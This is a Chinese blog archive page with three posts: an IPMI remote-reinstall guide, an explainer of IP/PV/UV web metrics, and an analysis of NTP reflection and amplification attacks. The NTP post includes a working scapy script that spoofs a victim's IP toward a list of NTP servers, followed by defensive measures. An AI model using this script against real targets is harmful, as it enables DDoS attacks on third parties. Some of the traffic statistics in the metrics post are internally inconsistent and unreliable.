存档

2016年3月 的存档

IPMI – KVM 控制远程重装服务器系统基本使用方法

2016年3月22日 没有评论


服务器使用IPMI安装系统教程,IPMI可以干什么?简单的说,IPMI可以远程给服务器重装系统,控制服务器电源的开机,关键和重启。当我们使用网络方式远程登录(远程桌面或者SSH)失败时,可以通过IPMI进行服务器的维护。专业点的理解就是 IPMI可以通过带外的方式来管理我们的服务器。

智能平台管理接口 (IPMI) 是一种开放标准的硬件管理接口规格,定义了嵌入式管理子系统进行通信的特定方法。IPMI 信息通过基板管理控制器 (BMC)(位于 IPMI 规格的硬件组件上)进行交流。使用低级硬件智能管理而不使用操作系统进行管理,具有两个主要优点: 首先,此配置允许进行带外服务器管理;其次,操作系统不必负担传输系统状态数据的任务。
下面我们使用常见的超微服务器介绍一下IPMI的使用方法:
一.我们在浏览器中输入IPMI的IP地址,然后会来到如下界面

二.我们输入相应的用户名和密码,点击login,会进入IPMI的内部了。IPMI的菜单比较多,如图所示

其实这些菜单根据名字都很好理解,我们下面就根据实际需要一个一个的介绍一下。
三.第一个菜单system是有关系统信息的,点开会看到:

四.这里,点击system information会弹出一下页面:

五.通过这个画面我们就可以看到主机内部的情况了。但是如果您不能看到这个界面,而是如下所示:

说明您的系统中没有装JAVA虚拟机,我们需要装上JAVA程序才能很好的使用IPMI。点击上图的确定,然后我们就来到java官方网站:

我们点击同意下载,然后浏览器会弹出下载对话框来:

点击保存文件,然后把jxpiinstall.exe下载下来之后,双击运行,就开始安装java虚拟机了。

 

六.安装完java虚拟机后,重启浏览器,就可以发现IPMI可以正常工作了。
下面,我们回到IPMI的这个菜单中.

七.我们点击方块中的按钮,可以看到如下画面

八.上面一个可以看到主机的信息,点击IPMI中的主机桌面的图片就可以进入控制台,如下图。power control via ipmi 是通过控制主机的电源来实现主机的开机,关机和重启。

九.这就是主机的控制台。同样,控制台也有几个菜单。一般情况下,我们通过文字就能较好的理解。下面我们介绍几个常用的菜单。

通过如上菜单的指示,我们可以直接向主机发送一些常用的组合键,最常用的莫过于 ctrl+alt+del了。


十.下图中这个菜单可以给主机添加ISO镜像。

点击virtual storage 后,在弹出的对话框中可以通过如下步骤添加ISO镜像:

注意,最后一定要点击plug in 才能把光盘插入系统哦。如果想把光盘弹出,可直接点击 plug out。
我们可以看到主机中已经有插入的光盘了:

挂载完成之后,我们登陆IPMI,点击导航菜单的Remote Control ,选择Console Redirection,打开launch console,下载jnlp文件运行,然后选择Macro→Ctrl+Alt+Del,重启服务器,启动时按F11,进入启动菜单,如下图:选择IPMI Virtual CDROM启动。

有时候国际网络太卡,使用键盘操作非常困难,我们看看怎样使用软键盘进行操作。

十一.下面让我们回到浏览器中,再来看一下IPMI其他几个有用的菜单:
远程控制菜单

通过点击远程控制的console redirection选项同样可以打开主机的控制台,通过 power cotrol选项同样可以控制主机的开机,关机和重启。
我们看一下怎样重置IPMI的选项。有时候,我们的IPMI也会紊乱,出现一些不正常的选项,需要进行重置。

通过点击 Unit Reset 在这个子页面中点击确定就可以重置IPMI系统,相当于重启一下IPMI这个设备。

通过点击IKVM Reset这个选项,在子页面中点击确定,就可以重置控制台kvm的会话,有时候会话多了或者时间长了,使用这个会很快解决问题的。

 

 

分类: 解决方案 标签: , ,

IP,PV ,UV 它们认识你,你认识它们吗

2016年3月3日 没有评论

今天说说IP,PV,UV这三个互联网产品常用词,具体定义大家可以知之为知之,不知度娘知,我就不粘贴复制了,显得我很没有诚意。

估计现在已经没有同行会问你,你们产品的IP了,因为IP是可以改变的,而且它并不能反映一些具体问题,当然它还是有用的,它可以让你大体了解你产品使用用户的分布,是一线城市多,还是二三线城市多,这样做的目的是可以指导你产品设计的时尚程度和接受程度,进行合理的调整,下面主要说说PV和UV。

1、什么是PV值
  PV(page view)即页面浏览量或点击量,是衡量一个网站或网页用户访问量。具体的说,PV值就是所有访问者在24小时(0点到24点)内看了某个网站多少个页面或某个网页多少次。PV是指页面刷新的次数,每一次页面刷新,就算做一次PV流量。
  度量方法就是从浏览器发出一个对网络服务器的请求(Request),网络服务器接到这个请求后,会将该请求对应的一个网页(Page)发送给浏览器,从而产生了一个PV。那么在这里只要是这个请求发送给了浏览器,无论这个页面是否完全打开(下载完成),那么都是应当计为1个PV。
  2、什么是UV值
  UV(unique visitor)即独立访客数,指访问某个站点或点击某个网页的不同IP地址的人数。在同一天内,UV只记录第一次进入网站的具有独立IP的访问者,在同一天内再次访问该网站则不计数。UV提供了一定时间内不同观众数量的统计指标,而没有反应出网站的全面活动。通过IP和cookie是判断UV值的两种方式:
  用Cookie分析UV值
  当客户端第一次访问某个网站服务器的时候,网站服务器会给这个客户端的电脑发出一个Cookie,通常放在这个客户端电脑的C盘当中。在这个Cookie中会分配一个独一无二的编号,这其中会记录一些访问服务器的信息,如访问时间,访问了哪些页面等等。当你下次再访问这个服务器的时候,服务器就可以直接从你的电脑中找到上一次放进去的Cookie文件,并且对其进行一些更新,但那个独一无二的编号是不会变的。

把抽象的PV和UV比作一个传统的场景,假设一下,淘宝是一个大的购物中心,第一种情况,一个喜欢你的女生陪你去买耳机,你们买完就走,对于UV,独立访问者而言就是2个,而PV呢就是指你俩只看了一个店铺,那么你们产生的浏览量就是2个。

第二种情况,你陪女神去买东西,你们2个人逛了7家店,那么UV还是2,而PV呢,则就是14。

第三种情况,你运气好追到女神了,你俩结婚了,时间长了,你再陪她逛街你就懒了,于是你俩同时进了购物中心,她自己去逛街,而你坐在购物广场的咖啡厅里等她,她逛了14家店,这个时候,而UV还是2,浏览量PV则是两者相加是15。

每一次加载页面就算一次PV,UV是要算你的cookies的,那么问题来了,还是陪你老婆逛街,你坐在咖啡店里,她逛了14家店,中午你俩出购物广场找朋友吃饭,吃完之后,你老婆还想逛街,你们俩从另外一个门进入购物广场,你坐在咖啡店,你老婆逛了14家店,那PV和UV均为多少?答案我会在下一次分享中告诉大家,当然你们也可以在平台给我留言,答对的朋友,也没有什么礼物,哇咔咔。

IP,UV,PV还是有一些区别的,比如IP是指网络虚拟地区的概念,UV更多的是反映独立使用者,UV相对于IP来说可以更加准确的描绘一个事件的浏览者。比如说,一个访客使用IE来访问,之后他又用翻墙软件还是通过IE来浏览,那么IP则是2,因为IP是基于地理位置的,而UV呢,则是1,至于为什么,自己往前翻,谢谢哒。

大家要一直有一个数据分析的思维在,比如:

PV/UV的合理值,一般是在5倍到10倍比较合理,当然不同性质的产品是不一样的,比如像纯论坛或者是图片网站,那么他的PV就会相对高一些,如果是电影网站PV就相对低一些。

根据这个数据可以来判断自己的产品。如果一个产品的PV/UV太高了,很有可能就是故意刷之,或者是用户加载页面次数太多,而如果太低的话,也不好,这说明你的页面可跳转页面太少,或者用户可能因为按钮啊什么原因,跳转的可能性太低。

下面我们来看看大/中/小网站的UV和PV:

Google是世界第一:UV:295,920,000;PV:7,107,998,400
百度是中国第一:UV=80,100,000,PV=703,278,000,基本上淘宝啊,新浪微博啊都是这个梯队的,前20左右。
第二梯队,20—100,比如汽车之家,它的UV就是在528,000万左右,PV大概在9240,000
第三梯队:100—1000,比如果壳网,UV大概是138,000,PV大概是828,000
在接手一个新的产品之前,你可以先建立一个坐标轴,UV,PV来分析这个产品大概的地位,做一些相关的调整,这是非常简单也是非常基础的东西。

3、IP即独立IP数
  IP可以理解为独立IP的访问用户,指1天内使用不同IP地址的用户访问网站的数量,同一IP无论访问了几个页面,独立IP数均为1。但是假如说两台机器访问而使用的是同一个IP,那么只能算是一个IP的访问。
  IP和UV之间的数据不会有太大的差异,通常UV量和比IP量高出一点,每个UV相对于每个IP更准确地对应一个实际的浏览者。
  ①UV大于IP
  这种情况就是在网吧、学校、公司等,公用相同IP的场所中不同的用户,或者多种不同浏览器访问您网站,那么UV数会大于IP数。
  ②UV小于IP
  在家庭中大多数电脑使用ADSL拨号上网,所以同一个用户在家里不同时间访问您网站时,IP可能会不同,因为它会根据时间变动IP,即动态的IP地址,但是实际访客数唯一,便会出现UV数小于IP数。

浅析基于 NTP 的反射和放大攻击

2016年3月3日 没有评论

最近一段时间 DDoS 攻击事件让基于 NTP 的 DDoS 攻击变得很火热。
1.什么是 NTP
NTP 是网络时间协议(Network Time Protocol)的简称,干嘛用的呢?就是通过网络协议使计算机之前的时间同步化。

2.NTP 反射和放大攻击
那什么是 NTP 反射和放大攻击呢?如果听过 DNS 反射和放大攻击的话应该就会对这个比较容易理解了,协议不同,效果一样。

我们先来说说放射和放大攻击:

无论是基于 DNS 还是基于 NTP,其最终都是基于 UDP 协议的。在 UDP 协议中正常情况下客户端发送请求包到服务端,服务端返回响应包到客户端,但是 UDP 协议是面向无连接的,所以客户端发送请求包的源 IP 很容易进行伪造,当把源 IP 修改为受害者的 IP,最终服务端返回的响应包就会返回到受害者的 IP。这就形成了一次反射攻击。

放大攻击呢就是一次小的请求包最终会收到一个或者多个多于请求包许多倍的响应包,这样就达到了四两拨千斤的效果。

那我们接着来看什么是 NTP 的反射和放大攻击,NTP 包含一个 monlist 功能,也被成为 MON_GETLIST,主要用于监控 NTP 服务器,NTP 服务器响应 monlist 后就会返回与 NTP 服务器进行过时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。

我们可以通过 ntpdc 命令向一个 NTP 服务器发送 monlist 以及结合抓包来看下实际的效果。

vps12com@test ~$ ntpdc -n -c monlist x.x.x.x | wc -l

602


在上面的命令行中我们可以看到一次含有 monlist 的请求收到 602 行数据,除去头两行是无效数据外,正好是 600 个客户端 IP 列表,并且从上面图中的 wireshark 中我们也看到显示有 101 个 NTP 协议的包,除去一个请求包,正好是 100 个响应包。

从上图中我们可以看到请求包的大小为 234 字节,每个响应包为 482 字节,如果单纯按照这个数据我们可以计算出放大的倍数是:482*100/234 = 206 倍。其实如果通过编写攻击脚本,请求包会更小,这个倍数值会更大,这样算起来是不是蛮屌的。

我们通过 scapy 实现一个简单的攻击脚本,代码如下:

?View Code PYTHON
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python
# author: vps12.com
 
import sys
from scapy.all import *
 
def attack(target, ntp_server):
    send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42)))
 
if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(1)
 
    target = sys.argv[1]
    ntp_server_file = sys.argv[2]
    for ntp_server in open(ntp_server_file, "r"):
        ntp_server = ntp_server.strip()
        if ntp_server != "":
            attack(target, ntp_server)

如何防御
我们可以分为两种情况进行防御
一、加固 NTP 服务
1. 把 NTP 服务器升级到 4.2.7p26及以上。
2. 关闭现在 NTP 服务的 monlist 功能,在ntp.conf配置文件中增加`disable monitor`选项
3. 在网络出口封禁 UDP 123 端口
二、防御 NTP 反射和放大攻击
1. 由于这种攻击的特征比较明显,所以可以通过网络层或者借助运营商实施 ACL 来防御
2. 使用防 DDoS 设备进行清洗